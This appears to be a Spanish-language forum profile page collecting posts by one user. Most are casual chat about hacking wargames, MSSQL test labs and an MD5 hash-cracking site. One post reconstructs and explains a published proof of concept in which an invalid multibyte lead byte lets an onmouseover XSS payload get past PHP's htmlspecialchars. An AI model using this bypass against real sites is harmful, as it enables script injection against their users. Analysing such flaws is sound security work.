Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3361
El wazone se cayo! :-s y justo que iba a pasar unas 5 o 10 pruebas :P

http://warzone.elhacker.net/

#3362
CitarA ver que alguien me explique xD que para el nivel web estoy bien n00b xD
Si todos nacieran sabiendo las cosas no existirían las escuelas o universidades.

El problema es que securityfocus es demasiado automatizado por lo tanto cuando alguien ingresa un código los escapan con caracteres especiales para que se puedan ver pero no se dan cuenta si alguien mas escapó los carácteres o no, en fin...

http://downloads.securityfocus.com/vulnerabilities/exploits/37389-2.php

Acá aparece una chorrera de código ilegible asi que lo primero que se ve es que son carácteres escapados como para visualizar en una página asi que seleccionamos todo y lo metemos en un solo archivo x.html y nos queda esto:

Código (php) [Seleccionar]
<? php $ _GET [ ' a1 ' ] = " \xf0 "; // \xf0 - \xfc で可能 $ _GET [ 'A1'] =
"\ xf0"; / / \ xf0 - \ xfc possible $ _GET [ ' a2 ' ] = " href=dummy onmouseover=
alert(document.title) dummy=dummy "; $ _GET [ 'A2'] = "href = dummy onmouseover
= alert (document.title) dummy = dummy"; header ( " Content-Type:text/html; charset
=Shift_JIS " ) ; header ( "Content-Type: text / html; charset = Shift_JIS"); ?> ? " < html >
<Html> < head >< title > Shift_JIS test </ title ></ head > <Head> <title> Shift_JIS test
</ title> </ head> < body > <Body> < p >< a <P> <a title = " <?php echo
 
htmlspecialchars ( $ _GET ' a1 ' ] , ENT_QUOTES' SJIS ' ?>
" title = "<? php echo
htmlspecialchars ($ _GET [ 'a1'], ENT_QUOTES, 'SJIS')?>" href = " <?php echo htmlspecialchars
 
( $ _GET ' a2 ' ] , ENT_QUOTES' SJIS ' ?>
" > test </ a ></ p > href = "<? php echo
htmlspecialchars ($ _GET [ 'a2'], ENT_QUOTES, 'SJIS')?>"> test </ a> </ p> </ body >
</ Body> </ html > </ Html>


Ahora, aun así es un desmadre porque hay espacios en blanco, no hay saltos de linea, no sabes donde termina un comentario, securityfocus repite los tags asi que bueno... lo limpié bastante y al final quedó así:

Código (php) [Seleccionar]
<?php
$_GET
['a1'] = "\xf0"// \xf0 - \xfc possible 
$_GET['a2'] = "href=dummy onmouseover=alert(document.title) dummy=dummy";
header("Content-Type:text/html; charset=Shift_JIS");
?>

<html>
<head>
<title>Shift_JIS test</title>
</head>
<body>
<p>
 <a
  title="<?php echo htmlspecialchars($_GET['a1'], ENT_QUOTES'SJIS'?>"
  href="<?php echo htmlspecialchars($_GET['a2'], ENT_QUOTES'SJIS'?>">
 test
</ a >
</p>
</body>
</html>


Ahora, en mi localhost al reproducir ese código y al pasar el mouse sobre el enlace aparece un alert mostrando el título, eso es código de ejecución por el lado del cliente porque se puede bypasear el htmlspecialchars, pero ¿SJIS?.

Todo indica que la vulnerabilidad está en el tipo de codificación SJIS ya que también se declara en el header, pero hagamos esto:

Código (php) [Seleccionar]
<?php
$_GET
['a1'] = "\xf0"// \xf0 - \xfc possible 
$_GET['a2'] = "href=dummy onmouseover=alert(document.title) dummy=dummy";
?>

<html>
<head>
<title>Shift_JIS test</title>
</head>
<body>
<p>
 <a
  title="<?php echo htmlspecialchars($_GET['a1'], ENT_QUOTES?>"
  href="<?php echo htmlspecialchars($_GET['a2'], ENT_QUOTES?>">
 test
</ a >
</p>
</body>
</html>


También se ejecuta sin la necesidad de ese tipo de codificación en especial imprimiendo "ð" al inicio de la variable, eso hace que se invalide el siguiente string que le si8gue, en este caso las comillas dobles que encerraban a title y ahora href=" pasa a cerrar title formando parte de el dejando paso a la ejecución que le des en href con la variable a2.
#3363
si pero si el correo no es tuyo no se vale porque despues esa cuenta deja de funcionar en twitter a menos que la confirmes o la cambies y eso desfollowearía a elhackernet
#3364
casi siempre las webs con mas reputación son las mas vulnerables a pesar que son los que mas gastan dinero. Talves en ves de gastar tanto dinero en crear la web deberían destinar una cantidad en auditar el sistema en busca de falencias.
#3365
Puedes montar un servidor iis con mssql en local e ir probando o puedes hacer un virtual con virtualbox y windows server 2003 (para que no pese mucho) y buscas scripts de ejemplos con querys de mssql.

Yo no tengo nada relacionado con mssql y asp, a exepción de un par de shells pero nada vulnerable a sqli.
Talves alguien que sepa programar en .net te pueda ayudar.
#3366
hace tiempo no se si se acuerdan hize un sistema que se llamaba "elf ripper md5" que era un sistema web que tu entrabas y le dabas una url de una web, entonces el sistema entraba ahi y separaba el contenido palabra por palabra e ingresaba su equivalente en hash md5 al sistema para poder crear un crackeador eficiente y todos los campos eran de tipo text.

En localhost lo probé dandole varios diccionarios de texto como archivo url pero cuando lo subí a un servidor web pude almacenar mas de 5 millones de hashses y las busquedas no demoraban mas de medio segundo aunque de todas formas si es por ahorrar recursos lo óptimo sería restringir el valor de un char a por lo menos 20 si es nombre y así dependiendo el tipo de dato a almacenar y verificar la longitud de carácteres desde php antes de ser procesado en la base de datos o si no retornará un path disclosure.
#3367
CitarCREATE TABLE ejemplo ( nombres CHAR(15), apellidos CHAR(15))

Y si tiene un usuario o cliente que se llame
María De las mercedes ozas Riquelme
xDDDD son 20 carácteres, por eso siempre ese tipo de campos para evitar errores y dar mas flexibilidad las declaro de tipo text.
#3368
eso no tiene nada que ver, o sea que si soy cristiano tengo que tener el arbol de navidad hasta septiembre? xD
el que es cristiano lo es de enro a enero.
#3369
Esque el foro es especial, aca las navidades duran hasta despues de enero.